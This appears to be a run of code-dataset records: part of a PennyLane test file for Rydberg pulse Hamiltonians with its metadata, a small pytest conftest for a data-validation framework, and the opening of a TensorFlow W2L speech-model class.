* np.pi), 0.5 * (2 * np.pi), 0.5 * (2 * np.pi)],\n [qml.Identity(0), qml.Identity(3), qml.PauliZ(0), qml.PauliZ(3)],\n ),\n qml.Hamiltonian([0.5, 0.5], [qml.PauliX(1), qml.PauliX(2)]),\n qml.Hamiltonian([-0.5, -0.5], [qml.PauliY(1), qml.PauliY(2)]),\n qml.Hamiltonian([0.5, 0.5], [qml.PauliX(0), qml.PauliX(3)]),\n qml.Hamiltonian([-0.5, -0.5], [qml.PauliY(0), qml.PauliY(3)]),\n qml.Hamiltonian(\n [-0.5 * (2 * np.pi), -0.5 * (2 * np.pi), 0.5 * (2 * np.pi), 0.5 * (2 * np.pi)],\n [qml.Identity(1), qml.Identity(2), qml.PauliZ(1), qml.PauliZ(2)],\n ),\n ]\n coeffs_expected = [\n 3,\n np.cos(3),\n np.sin(3),\n AmplitudeAndPhase(np.cos, fa, 1),\n AmplitudeAndPhase(np.sin, fa, 1),\n fb,\n ]\n H_expected = HardwareHamiltonian(coeffs_expected, ops_expected)\n\n # structure of Hamiltonian is as expected\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires([0, 3, 1, 2])\n assert Hd.settings is None\n assert len(Hd.ops) == 6 # 2 terms for amplitude/phase and one detuning for each drive\n\n # coefficients are correct\n # Callable coefficients are shifted to the end of the list.\n assert Hd.coeffs[0:3] == [3, np.cos(3), np.sin(3)]\n assert isinstance(Hd.coeffs[3], AmplitudeAndPhase)\n assert isinstance(Hd.coeffs[4], AmplitudeAndPhase)\n assert Hd.coeffs[5] is fb\n\n # pulses were added correctly\n assert len(Hd.pulses) == 2\n assert Hd.pulses == H1.pulses + H2.pulses\n\n # Hamiltonian is as expected\n assert qml.equal(Hd([0.5, -0.5], t=5), H_expected([0.5, -0.5], t=5))\n\n def test_no_amplitude(self):\n \"\"\"Test that when amplitude is not specified, the drive term is correctly defined.\"\"\"\n\n # factors (2 * np.pi) to convert between angular and standard frequency\n def f(p, t):\n return np.cos(p * t) / (2 * np.pi)\n\n Hd = rydberg_drive(amplitude=0, phase=1, detuning=f, wires=[0, 3])\n\n ops_expected = [\n qml.Hamiltonian(\n [-0.5 * (2 * np.pi), -0.5 * (2 * np.pi), 0.5 * (2 * np.pi), 0.5 * (2 * np.pi)],\n [qml.Identity(0), qml.Identity(3), qml.PauliZ(0), qml.PauliZ(3)],\n )\n ]\n coeffs_expected = [f]\n H_expected = HardwareHamiltonian(coeffs_expected, ops_expected)\n\n assert qml.equal(Hd([0.1], 10), H_expected([0.1], 10))\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires([0, 3])\n assert Hd.settings is None\n assert len(Hd.coeffs) == 1\n assert Hd.coeffs[0] is f\n assert len(Hd.ops) == 1\n assert qml.equal(Hd.ops[0], ops_expected[0])\n\n def test_no_detuning(self):\n \"\"\"Test that when detuning not specified, the drive term is correctly defined.\"\"\"\n\n def f(p, t):\n return np.cos(p * t)\n\n Hd = rydberg_drive(amplitude=f, phase=1, detuning=0, wires=[0, 3])\n\n ops_expected = [\n qml.Hamiltonian([0.5, 0.5], [qml.PauliX(0), qml.PauliX(3)]),\n qml.Hamiltonian([-0.5, -0.5], [qml.PauliY(0), qml.PauliY(3)]),\n ]\n coeffs_expected = [\n AmplitudeAndPhase(np.cos, f, 1),\n AmplitudeAndPhase(np.sin, f, 1),\n ]\n H_expected = HardwareHamiltonian(coeffs_expected, ops_expected)\n\n assert qml.equal(Hd([0.1], 10), H_expected([0.1], 10))\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires([0, 3])\n assert Hd.settings is None\n assert all(isinstance(coeff, AmplitudeAndPhase) for coeff in Hd.coeffs)\n assert len(Hd.coeffs) == 2\n assert all(qml.equal(op, op_expected) for op, op_expected in zip(Hd.ops, ops_expected))\n\n def test_no_amplitude_no_detuning(self):\n \"\"\"Test that the correct error is raised if both amplitude and detuning are trivial.\"\"\"\n with pytest.raises(ValueError, match=\"Expected non-zero value for at least one of 
either\"):\n _ = rydberg_drive(0, np.pi, 0, wires=[0])\n\n\n# For rydberg settings test\nregister0 = [[0.0, 1.0], [0.0, 2.0]]\nregister1 = [[2.0, 0.3], [1.0, 4.0], [0.5, 0.4]]\n\n\nclass TestRydbergSettings:\n \"\"\"Unit tests for TransmonSettings dataclass\"\"\"\n\n def test_init(self):\n \"\"\"Test the initialization of the ``RydbergSettings`` class.\"\"\"\n settings = RydbergSettings(register0)\n assert settings.register == register0\n assert settings.interaction_coeff == 0.0\n\n def test_equal(self):\n \"\"\"Test the ``__eq__`` method of the ``RydbergSettings`` class.\"\"\"\n settings0 = RydbergSettings(register0)\n settings1 = RydbergSettings(register1, interaction_coeff=2.0)\n settings2 = RydbergSettings(register0, interaction_coeff=0.0)\n assert settings0 != settings1\n assert settings1 != settings2\n assert settings0 == settings2\n\n def test_add_two_settings(\n self,\n ):\n \"\"\"Test that two RydbergSettings are correctly added\"\"\"\n\n settings0 = RydbergSettings(register0, interaction_coeff=2.0)\n settings1 = None\n\n settings01 = settings0 + settings1\n settings10 = settings1 + settings0\n assert settings01.register == register0\n assert settings01.interaction_coeff == 2.0\n assert settings10.register == register0\n assert settings10.interaction_coeff == 2.0\n\n # pylint: disable=unused-variable\n def test_raises_error_two_interaction_terms(\n self,\n ):\n \"\"\"Raises error when attempting to add two non-trivial RydbergSettings\"\"\"\n settings0 = RydbergSettings(register0)\n settings1 = RydbergSettings(register1)\n with pytest.raises(ValueError, match=\"Cannot add two\"):\n res = settings0 + settings1\n\n\nclass TestIntegration:\n \"\"\"Integration tests for Rydberg system Hamiltonians.\"\"\"\n\n @pytest.mark.jax\n def test_jitted_qnode(self):\n \"\"\"Test that a Rydberg ensemble can be simulated within a jitted qnode.\"\"\"\n import jax\n import jax.numpy as jnp\n\n Hd = rydberg_interaction(register=atom_coordinates, wires=wires)\n\n def fa(p, t):\n return jnp.polyval(p, t)\n\n def fb(p, t):\n return p[0] * jnp.sin(p[1] * t)\n\n Ht = rydberg_drive(amplitude=fa, phase=0, detuning=fb, wires=1)\n\n dev = qml.device(\"default.qubit\", wires=wires)\n\n ts = jnp.array([0.0, 3.0])\n H_obj = sum(qml.PauliZ(i) for i in range(2))\n\n @qml.qnode(dev, interface=\"jax\")\n def qnode(params):\n qml.evolve(Hd + Ht)(params, ts)\n return qml.expval(H_obj)\n\n @jax.jit\n @qml.qnode(dev, interface=\"jax\")\n def qnode_jit(params):\n qml.evolve(Hd + Ht)(params, ts)\n return qml.expval(H_obj)\n\n params = (jnp.ones(5), jnp.array([1.0, jnp.pi]))\n res = qnode(params)\n res_jit = qnode_jit(params)\n\n assert isinstance(res, jax.Array)\n assert np.allclose(res, res_jit)\n\n @pytest.mark.jax\n def test_jitted_qnode_multidrive(self):\n \"\"\"Test that a Rydberg ensemble with multiple drive terms can be\n executed within a jitted qnode.\"\"\"\n import jax\n import jax.numpy as jnp\n\n Hd = rydberg_interaction(register=atom_coordinates, wires=wires)\n\n def fa(p, t):\n return jnp.polyval(p, t)\n\n def fb(p, t):\n return p[0] * jnp.sin(p[1] * t)\n\n def fc(p, t):\n return p[0] * jnp.sin(t) + jnp.cos(p[1] * t)\n\n def fd(p, t):\n return p * jnp.cos(t)\n\n H1 = rydberg_drive(amplitude=fa, phase=0, detuning=fb, wires=wires)\n H2 = rydberg_drive(amplitude=fc, phase=3 * jnp.pi, detuning=0, wires=4)\n H3 = rydberg_drive(amplitude=0, phase=0, detuning=fd, wires=[3, 0])\n\n dev = qml.device(\"default.qubit\", wires=wires)\n\n ts = jnp.array([0.0, 3.0])\n H_obj = sum(qml.PauliZ(i) for i in range(2))\n\n 
@qml.qnode(dev, interface=\"jax\")\n def qnode(params):\n qml.evolve(Hd + H1 + H2 + H3)(params, ts)\n return qml.expval(H_obj)\n\n @jax.jit\n @qml.qnode(dev, interface=\"jax\")\n def qnode_jit(params):\n qml.evolve(Hd + H1 + H2 + H3)(params, ts)\n return qml.expval(H_obj)\n\n params = (\n jnp.ones(5),\n jnp.array([1.0, jnp.pi]),\n jnp.array([jnp.pi / 2, 0.5]),\n jnp.array(-0.5),\n )\n res = qnode(params)\n res_jit = qnode_jit(params)\n\n assert isinstance(res, jax.Array)\n assert np.allclose(res, res_jit)\n\n @pytest.mark.jax\n def test_jitted_qnode_all_coeffs_callable(self):\n \"\"\"Test that a Rydberg ensemble can be simulated within a\n jitted qnode when all coeffs are callable.\"\"\"\n import jax\n import jax.numpy as jnp\n\n H_drift = rydberg_interaction(register=atom_coordinates, wires=wires)\n\n def fa(p, t):\n return jnp.polyval(p, t)\n\n def fb(p, t):\n return p[0] * jnp.sin(p[1] * t)\n\n def fc(p, t):\n return p[0] * jnp.sin(t) + jnp.cos(p[1] * t)\n\n H_drive = rydberg_drive(amplitude=fa, phase=fb, detuning=fc, wires=1)\n\n dev = qml.device(\"default.qubit\", wires=wires)\n\n ts = jnp.array([0.0, 3.0])\n H_obj = sum(qml.PauliZ(i) for i in range(2))\n\n @qml.qnode(dev, interface=\"jax\")\n def qnode(params):\n qml.evolve(H_drift + H_drive)(params, ts)\n return qml.expval(H_obj)\n\n @jax.jit\n @qml.qnode(dev, interface=\"jax\")\n def qnode_jit(params):\n qml.evolve(H_drift + H_drive)(params, ts)\n return qml.expval(H_obj)\n\n params = (jnp.ones(5), jnp.array([1.0, jnp.pi]), jnp.array([jnp.pi / 2, 0.5]))\n res = qnode(params)\n res_jit = qnode_jit(params)\n\n assert isinstance(res, jax.Array)\n assert np.allclose(res, res_jit)\n\n @pytest.mark.jax\n def test_pennylane_and_exact_solution_correspond(self):\n \"\"\"Test that the results of PennyLane simulation match (within reason) the exact solution\"\"\"\n import jax\n import jax.numpy as jnp\n\n def exact(H, H_obj, t):\n psi0 = jnp.eye(2 ** len(H.wires))[0]\n U_exact = jax.scipy.linalg.expm(-1j * t * qml.matrix(H([], 1)))\n return (\n psi0 @ U_exact.conj().T @ qml.matrix(H_obj, wire_order=[0, 1, 2]) @ U_exact @ psi0\n )\n\n default_qubit = qml.device(\"default.qubit\", wires=3)\n\n coordinates = [[0, 0], [0, 5], [5, 0]]\n\n H_i = qml.pulse.rydberg_interaction(coordinates)\n\n H = H_i + qml.pulse.rydberg_drive(3, 2, 4, [0, 1, 2])\n\n H_obj = qml.PauliZ(0)\n\n @jax.jit\n @qml.qnode(default_qubit, interface=\"jax\")\n def circuit(t):\n qml.evolve(H)([], t)\n return qml.expval(H_obj)\n\n t = jnp.linspace(0.05, 1.55, 151)\n\n circuit_results = np.array([circuit(_t) for _t in t])\n exact_results = np.array([exact(H, H_obj, _t) for _t in t])\n\n # all results are approximately the same\n np.allclose(circuit_results, exact_results, atol=0.07)\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "tests/pulse/test_rydberg.py", "file_name": "test_rydberg.py", "file_ext": "py", "file_size_in_byte": 16016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pennylane.queuing.AnnotatedQueue", "line_number": 24, "usage_type": "call"}, {"api_name": "pennylane.queuing", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 25, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 32, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 33, "usage_type": "call"}, {"api_name": 
"pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 35, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 36, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 46, "usage_type": "call"}, {"api_name": "pennylane.wires.Wires", "line_number": 48, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 55, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 60, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pennylane.equal", "line_number": 84, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 94, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 96, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 98, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwarePulse", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 110, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 112, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pennylane.Hamiltonian", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pennylane.Identity", "line_number": 119, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 119, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 121, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 121, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 122, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 122, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 123, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 123, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 124, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 124, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pennylane.Identity", "line_number": 127, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 133, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.cos", 
"line_number": 134, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 138, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 141, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 148, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 149, "usage_type": "argument"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 150, "usage_type": "argument"}, {"api_name": "pennylane.equal", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 167, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pennylane.Identity", "line_number": 172, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 172, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 176, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 178, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 179, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 180, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 191, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 193, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 196, "usage_type": "call"}, {"api_name": "pennylane.PauliX", "line_number": 196, "usage_type": "call"}, {"api_name": "pennylane.Hamiltonian", "line_number": 197, "usage_type": "call"}, {"api_name": "pennylane.PauliY", "line_number": 197, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 200, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 203, "usage_type": "call"}, {"api_name": "pennylane.equal", "line_number": 205, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.HardwareHamiltonian", "line_number": 206, "usage_type": "argument"}, {"api_name": "pennylane.wires.Wires", "line_number": 207, "usage_type": "call"}, {"api_name": "pennylane.pulse.hardware_hamiltonian.AmplitudeAndPhase", "line_number": 209, "usage_type": "argument"}, {"api_name": "pennylane.equal", "line_number": 211, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 215, "usage_type": "call"}, {"api_name": 
"pennylane.pulse.rydberg_drive", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 216, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 229, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 235, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 236, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 237, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 247, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 262, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg.RydbergSettings", "line_number": 263, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 264, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 277, "usage_type": "call"}, {"api_name": "jax.numpy.polyval", "line_number": 280, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 280, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 283, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 283, "usage_type": "name"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 285, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 287, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 289, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 289, "usage_type": "name"}, {"api_name": "pennylane.PauliZ", "line_number": 290, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 294, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 295, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 292, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 300, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 301, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 298, "usage_type": "call"}, {"api_name": "jax.numpy.ones", "line_number": 303, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 303, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 303, "usage_type": "call"}, {"api_name": "jax.numpy.pi", "line_number": 303, "usage_type": "attribute"}, {"api_name": "jax.Array", "line_number": 307, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 308, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 317, "usage_type": "call"}, {"api_name": "jax.numpy.polyval", "line_number": 320, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 320, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 323, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 323, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 326, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 326, "usage_type": "name"}, {"api_name": "jax.numpy.cos", "line_number": 326, "usage_type": "call"}, {"api_name": "jax.numpy.cos", "line_number": 329, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 329, "usage_type": "name"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 331, "usage_type": 
"call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 332, "usage_type": "call"}, {"api_name": "jax.numpy.pi", "line_number": 332, "usage_type": "attribute"}, {"api_name": "jax.numpy", "line_number": 332, "usage_type": "name"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 333, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 335, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 337, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 337, "usage_type": "name"}, {"api_name": "pennylane.PauliZ", "line_number": 338, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 342, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 343, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 340, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 348, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 349, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 345, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 346, "usage_type": "call"}, {"api_name": "jax.numpy.ones", "line_number": 352, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 352, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 353, "usage_type": "name"}, {"api_name": "jax.numpy.pi", "line_number": 353, "usage_type": "attribute"}, {"api_name": "jax.numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 354, "usage_type": "name"}, {"api_name": "jax.numpy.pi", "line_number": 354, "usage_type": "attribute"}, {"api_name": "jax.numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 355, "usage_type": "name"}, {"api_name": "jax.Array", "line_number": 360, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 361, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 310, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 370, "usage_type": "call"}, {"api_name": "jax.numpy.polyval", "line_number": 373, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 373, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 376, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 376, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 379, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 379, "usage_type": "name"}, {"api_name": "jax.numpy.cos", "line_number": 379, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 381, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 383, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 385, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 385, "usage_type": "name"}, {"api_name": "pennylane.PauliZ", "line_number": 386, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 390, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 391, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 388, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 396, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 397, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 393, "usage_type": "attribute"}, {"api_name": 
"pennylane.qnode", "line_number": 394, "usage_type": "call"}, {"api_name": "jax.numpy.ones", "line_number": 399, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 399, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 399, "usage_type": "call"}, {"api_name": "jax.numpy.pi", "line_number": 399, "usage_type": "attribute"}, {"api_name": "jax.Array", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 404, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 363, "usage_type": "attribute"}, {"api_name": "jax.numpy.eye", "line_number": 413, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 413, "usage_type": "name"}, {"api_name": "jax.scipy.linalg.expm", "line_number": 414, "usage_type": "call"}, {"api_name": "jax.scipy", "line_number": 414, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 414, "usage_type": "call"}, {"api_name": "pennylane.matrix", "line_number": 416, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 419, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 423, "usage_type": "call"}, {"api_name": "pennylane.pulse", "line_number": 423, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 425, "usage_type": "call"}, {"api_name": "pennylane.pulse", "line_number": 425, "usage_type": "attribute"}, {"api_name": "pennylane.PauliZ", "line_number": 427, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 432, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 433, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 429, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 430, "usage_type": "call"}, {"api_name": "jax.numpy.linspace", "line_number": 435, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 435, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 441, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 406, "usage_type": "attribute"}]} +{"seq_id": "7258223844", "text": "\"\"\"Configuration for the pytest test suite.\"\"\"\n# pylint: disable=missing-function-docstring\nimport os\nfrom pathlib import Path\n\nimport pytest\n\nfrom data_validation_framework.target import OutputLocalTarget\n\nDATA = Path(__file__).parent / \"data\"\n\n\n@pytest.fixture()\ndef tmp_working_dir(tmp_path):\n \"\"\"Change working directory before a test and change it back when the test is finished.\"\"\"\n cwd = os.getcwd()\n os.chdir(tmp_path)\n yield tmp_path\n os.chdir(cwd)\n\n\n@pytest.fixture()\ndef data_dir():\n \"\"\"Path to the directory where the data are stored.\"\"\"\n return DATA\n\n\n@pytest.fixture(autouse=True)\ndef reset_target_prefix(tmpdir):\n \"\"\"Automatically set the default prefix to the current test directory.\"\"\"\n OutputLocalTarget.set_default_prefix(tmpdir)\n yield\n OutputLocalTarget.set_default_prefix(None)\n", "repo_name": "BlueBrain/data-validation-framework", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, 
"usage_type": "call"}, {"api_name": "os.chdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 19, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "data_validation_framework.target.OutputLocalTarget.set_default_prefix", "line_number": 31, "usage_type": "call"}, {"api_name": "data_validation_framework.target.OutputLocalTarget", "line_number": 31, "usage_type": "name"}, {"api_name": "data_validation_framework.target.OutputLocalTarget.set_default_prefix", "line_number": 33, "usage_type": "call"}, {"api_name": "data_validation_framework.target.OutputLocalTarget", "line_number": 33, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "4109861303", "text": "import os\nimport time\nfrom collections import defaultdict\n\nimport tensorflow as tf\nimport tensorflow.keras.layers as layers\nimport tensorflow_probability as tfp\nimport numpy as np\n\n\nGRIDS = {16: (4, 4), 32: (8, 4), 64: (8, 8), 128: (16, 8), 256: (16, 16),\n 512: (32, 16), 1024: (32, 32), 2048: (64, 32)}\n\n\nclass W2L:\n def __init__(self, model_dir, vocab_size, n_channels, data_format,\n reg=(None, 0.)):\n if data_format not in [\"channels_first\", \"channels_last\"]:\n raise ValueError(\"Invalid data type specified: {}. Use either \"\n \"channels_first or \"\n \"channels_last.\".format(data_format))\n\n self.model_dir = model_dir\n self.data_format = data_format\n self.cf = self.data_format == \"channels_first\"\n self.n_channels = n_channels\n self.vocab_size = vocab_size\n self.regularizer_type = reg[0]\n 